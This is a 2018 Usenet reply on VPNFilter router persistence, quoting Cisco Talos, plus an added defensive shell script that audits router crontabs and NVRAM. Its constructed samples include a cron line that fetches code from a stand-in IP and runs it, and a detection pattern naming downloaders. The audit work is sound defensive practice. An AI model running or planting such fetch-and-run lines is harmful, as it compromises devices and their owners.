On Wed, 30 May 2018 10:19:09 +1000, Clifford Heath wrote:
> Also: "Cisco said part of the code used by VPNFilter can still persist
> until the affected device is reset to its factory-default settings."
> So a reset actually might be required.
You're right. Here's the source of the Cisco recommendation:
https://blog.talosintelligence.com/2018/05/VPNFilter.html
See "Stage 1 (Persistent Loader)" section:
VPNFilter's stage 1 malware infects devices running firmware
based on Busybox and Linux, and is compiled for several CPU
architectures. The main purpose of these first-stage binaries
is to locate a server providing a more fully featured second
stage, and to download and maintain persistence for this next
stage on infected devices. It is capable of modifying
non-volatile configuration memory (NVRAM) values and adds
itself to crontab, the Linux job scheduler, to achieve
persistence.
So, it looks like I might be doing some resets to defaults and firmware
updates on affected routers. The crontab file is probably in the
firmware. Argh.
Incidentally, of the two customers who reset their routers to
defaults, I was able to recover by walking them through the initial
setup to get their device on the internet, and then restoring their
saved settings, which I save for every router I configure. I didn't
charge either customer if they promised to never do that again.
However, if they're on the affected router list, I'll need to visit
them and update the firmware.
--
Jeff Liebermann
150 Felker St #D http://www.LearnByDestroying.com
Santa Cruz CA 95060
http://802.11junk.com
Skype: JeffLiebermann AE6KS 831-336-2558
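The Talos section quoted above names two places stage 1 persists: the cron job scheduler and NVRAM. Below is an added example of a check a technician could run on a BusyBox router before deciding on a reset; it is not code from the post or from Cisco Talos. It assumes the usual BusyBox crond crontab directories (/etc/crontabs and /var/spool/cron/crontabs) and a Broadcom-style nvram CLI whose "nvram show" prints one key=value per line; both are assumptions about a given firmware. The crontab and NVRAM samples it scans are constructed for illustration and are not indicators from the Talos report.

```shell
#!/bin/sh
# Added example: not code from the original post or from Cisco Talos.
# The Talos write-up says stage 1 persists through the cron job scheduler
# and through NVRAM values. This script looks in both places for entries
# that run programs from writable storage or fetch code over the network,
# which is what a hand audit of a router would look for. Assumptions:
# the per-user crontab directories are the usual BusyBox crond ones, and
# "nvram show" prints one key=value per line (Broadcom-style CLI). Every
# sample file below is constructed for illustration and is not an IOC.

# Assumed BusyBox crond crontab directories (OpenWrt and older firmwares).
CRON_DIRS="/etc/crontabs /var/spool/cron/crontabs"

# Suspicious in a cron command or an NVRAM value: a program under a
# writable/runtime path, or a download command or URL.
SUSPICIOUS='/tmp/|/var/|/dev/shm/|/overlay/|/jffs/|wget |curl |tftp |ftpget |https?://'

# count_suspicious FILE: print how many non-comment lines match SUSPICIOUS.
count_suspicious() {
    grep -v '^[[:space:]]*#' "$1" | grep -E -c "$SUSPICIOUS" || true
}

# show_suspicious FILE: print the matching lines, prefixed with the file name.
show_suspicious() {
    grep -v '^[[:space:]]*#' "$1" | grep -E "$SUSPICIOUS" | sed "s|^|$1: |" || true
}

# audit_router: check the live cron directories and, when the nvram CLI
# exists, a dump of its variables. Exit status 1 if anything was flagged.
audit_router() {
    total=0
    for d in $CRON_DIRS; do
        [ -d "$d" ] || continue
        for f in "$d"/*; do
            [ -f "$f" ] || continue
            show_suspicious "$f"
            total=$((total + $(count_suspicious "$f")))
        done
    done
    if command -v nvram >/dev/null 2>&1; then
        dump=$(mktemp)
        nvram show > "$dump" 2>/dev/null || true
        show_suspicious "$dump"
        total=$((total + $(count_suspicious "$dump")))
        rm -f "$dump"
    fi
    echo "flagged entries: $total"
    [ "$total" -eq 0 ]
}

# Constructed sample root crontab: one normal job, two that a review should flag.
SAMPLE_CRONTAB=$(mktemp)
cat > "$SAMPLE_CRONTAB" <<'EOF'
# constructed sample, not a real crontab
0 3 * * * /sbin/ntpd -q -p pool.ntp.org
*/5 * * * * /tmp/.x/loader
0 * * * * wget -q -O /var/run/s http://198.51.100.7/s && sh /var/run/s
EOF

# Constructed sample "nvram show" output: one startup variable carrying a command.
SAMPLE_NVRAM=$(mktemp)
cat > "$SAMPLE_NVRAM" <<'EOF'
wan_proto=dhcp
lan_ipaddr=192.168.1.1
rc_startup=sh /tmp/.x/run
ntp_server=pool.ntp.org
EOF
trap 'rm -f "$SAMPLE_CRONTAB" "$SAMPLE_NVRAM"' EXIT

# Run over the constructed samples; on a real router, call audit_router instead.
show_suspicious "$SAMPLE_CRONTAB"
show_suspicious "$SAMPLE_NVRAM"
```

On the constructed samples the two cron jobs that load from /tmp and fetch over HTTP are flagged, as is the NVRAM startup variable; the ntpd job and plain configuration keys are not. The patterns are deliberately broad (anything living in runtime storage, any downloader or URL), so a hit is a prompt to read the entry, not a verdict. Whatever the audit shows, it does not replace what Cisco recommends: a reset to factory defaults clears both the crontab and the NVRAM values, and the firmware update closes the way back in.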